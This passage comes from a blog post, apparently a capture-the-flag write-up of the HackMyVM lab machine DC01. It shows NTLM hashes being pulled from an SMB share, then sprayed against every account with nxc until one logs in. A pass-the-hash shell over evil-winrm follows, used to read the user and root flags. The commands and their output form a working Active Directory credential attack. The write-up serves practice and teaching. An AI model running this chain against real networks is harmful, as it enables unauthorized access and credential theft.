\nPassword for [WORKGROUP\\file_svc]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Mon Jun 17 13:41:17 2024\n  ..                                 DR        0  Mon Jun 17 13:44:56 2024\n  backup_extract.txt                  A      892  Mon Jun 17 04:41:05 2024\n\n                12942591 blocks of size 4096. 
10810869 blocks available\nsmb: \\&gt; get backup_extract.txt \ngetting file \\backup_extract.txt of size 892 as backup_extract.txt (14.8 KiloBytes\/sec) (average 14.8 KiloBytes\/sec)\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ cat backup_extract.txt \nWebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::\nDatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::\nCitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::\nFileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::\nMailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::\nBackupServer$:2125:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::\nApplicationServer$:2126:aad3b435b51404eeaad3b435b51404ee:8cd90ac6cba6dde9d8038b068c17e9f5:::\nPrintServer$:2127:aad3b435b51404eeaad3b435b51404ee:b8a38c432ac59ed00b2a373f4f050d28:::\nProxyServer$:2128:aad3b435b51404eeaad3b435b51404ee:4e3f0bb3e5b6e3e662611b1a87988881:::\nMonitoringServer$:2129:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::<\/code><\/pre>\n<p>Then try to crack them:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ awk -F &#039;[:]&#039; &#039;{print $1}&#039; backup_extract.txt\nWebServer$\nDatabaseServer$\nCitrixServer$\nFileServer$\nMailServer$\nBackupServer$\nApplicationServer$\nPrintServer$\nProxyServer$\nMonitoringServer$\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ awk -F &#039;[:]&#039; &#039;{print $4}&#039; 
backup_extract.txt\nc47b45f5d4df5a494bd19f13e14f7902\n406b424c7b483a42458bf6f545c936f7\n48fc7eca9af236d7849273990f6c5117\ne41da7e79a4c76dbd9cf79d1cb325559\n46a4655f18def136b3bfab7b0b4e70e3\n46a4655f18def136b3bfab7b0b4e70e3\n8cd90ac6cba6dde9d8038b068c17e9f5\nb8a38c432ac59ed00b2a373f4f050d28\n4e3f0bb3e5b6e3e662611b1a87988881\n48fc7eca9af236d7849273990f6c5117\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ hash-identifier                                                    \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/&#039;__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: 48fc7eca9af236d7849273990f6c5117\n\nPossible Hashs:\n[+] MD5\n[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))<\/code><\/pre>\n<p>Try to crack them:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ nxc smb $IP -u user -H hash_pass \nSMB         
192.168.10.106  445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)\nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] 
SOUPEDECODE.LOCAL\\CitrixServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\FileServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MailServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\BackupServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  
445    DC01             [-] SOUPEDECODE.LOCAL\\ApplicationServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\PrintServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\ProxyServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\MonitoringServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\WebServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\DatabaseServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [-] SOUPEDECODE.LOCAL\\CitrixServer$:e41da7e79a4c76dbd9cf79d1cb325559 STATUS_LOGON_FAILURE \nSMB         192.168.10.106  445    DC01             [+] SOUPEDECODE.LOCAL\\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)<\/code><\/pre>\n<p>Got one user credential!<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257571.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408161257571.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240816125204825\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>Finding the flag<\/h2>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01]\n\u2514\u2500$ evil-winrm -i $IP -u &#039;FileServer$&#039; -H &#039;e41da7e79a4c76dbd9cf79d1cb325559&#039;\n\nEvil-WinRM shell v3.5\n\nWarning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine\n\nData: For more information, check Evil-WinRM GitHub: https:\/\/github.com\/Hackplayers\/evil-winrm#Remote-path-completion\n\nInfo: Establishing connection to remote endpoint\n*Evil-WinRM* PS C:\\Users\\FileServer$\\Documents&gt; cd ..\/..\/\n*Evil-WinRM* PS C:\\Users&gt; dir \/s *.txt\nCannot find path &#039;C:\\s&#039; because it does not exist.\nAt line:1 char:1\n+ dir \/s *.txt\n+ ~~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (C:\\s:String) [Get-ChildItem], ItemNotFoundException\n    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n*Evil-WinRM* PS C:\\Users&gt; ls -la\nA parameter cannot be found that matches parameter name &#039;la&#039;.\nAt line:1 char:4\n+ ls -la\n+    ~~~\n    + CategoryInfo          : InvalidArgument: (:) [Get-ChildItem], ParameterBindingException\n    + FullyQualifiedErrorId : NamedParameterNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand\n*Evil-WinRM* PS C:\\Users&gt; clear\n*Evil-WinRM* PS C:\\Users&gt; cls\n*Evil-WinRM* PS C:\\Users&gt; ls\n\n    Directory: C:\\Users\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-----         6\/15\/2024  12:56 PM                Administrator\nd-----         8\/16\/2024  12:28 PM                FileServer$\nd-r---         6\/15\/2024  10:54 AM                Public\nd-----         6\/17\/2024  10:24 AM                ybob317\n\n*Evil-WinRM* PS C:\\Users&gt; cd ybob317\n*Evil-WinRM* PS C:\\Users\\ybob317&gt; dir\n\n    Directory: C:\\Users\\ybob317\n\nMode            
     LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-r---         6\/17\/2024  10:24 AM                3D Objects\nd-r---         6\/17\/2024  10:24 AM                Contacts\nd-r---         6\/17\/2024  10:45 AM                Desktop\nd-r---         6\/17\/2024  10:24 AM                Documents\nd-r---         6\/17\/2024  10:24 AM                Downloads\nd-r---         6\/17\/2024  10:24 AM                Favorites\nd-r---         6\/17\/2024  10:24 AM                Links\nd-r---         6\/17\/2024  10:24 AM                Music\nd-r---         6\/17\/2024  10:24 AM                Pictures\nd-r---         6\/17\/2024  10:24 AM                Saved Games\nd-r---         6\/17\/2024  10:24 AM                Searches\nd-r---         6\/17\/2024  10:24 AM                Videos\n\n*Evil-WinRM* PS C:\\Users\\ybob317&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; dir\n\n    Directory: C:\\Users\\ybob317\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----         6\/12\/2024   4:54 AM             32 user.txt\n\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; type user.txt\nxxxxxxxxxx\n*Evil-WinRM* PS C:\\Users\\ybob317\\Desktop&gt; cd ..\/..\/Administrator\n*Evil-WinRM* PS C:\\Users\\Administrator&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop&gt; dir\n\n    Directory: C:\\Users\\Administrator\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\nd-----         6\/17\/2024  10:41 AM                backup\n-a----         6\/17\/2024  10:44 AM             32 root.txt\n\n*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop&gt; type root.txt\nxxxxxxxxxx<\/code><\/pre>\n<p>It was a rough road, but at least the outcome was good.....<\/p>\n<h2>References<\/h2>\n<p><a 
href=\"https:\/\/mikannse.space\/2024\/07\/14\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E4%B8%80%E4%B8%80%E5%85%AB)%E4%B9%8BHMVDC01\/\">https:\/\/mikannse.space\/2024\/07\/14\/%E6%89%93%E9%9D%B6%E8%AE%B0%E5%BD%95(%E4%B8%80%E4%B8%80%E5%85%AB)%E4%B9%8BHMVDC01\/<\/a><\/p>\n<p><a href=\"https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/DC01.txt\">https:\/\/github.com\/Brntpcnr\/WriteupsHMV\/blob\/main\/DC01.txt<\/a><\/p>\n<p><a href=\"https:\/\/y4er.com\/posts\/kerberos-kerberoasting-spn\/\">https:\/\/y4er.com\/posts\/kerberos-kerberoasting-spn\/<\/a><\/p>\n<p><a href=\"https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/DC01\">https:\/\/gaznetsystems.com\/Hackmyvm\/Easy\/DC01<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>DC01 Information gathering Port scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DC01] \u2514\u2500$ nmap -P [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-783","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=783"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783\/revisions"}],"predecessor-version":[{"id":784,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/783\/revisions\/784"}],"wp:attachment":[{"href":"http:\/\/16
2.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=783"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=783"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=783"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}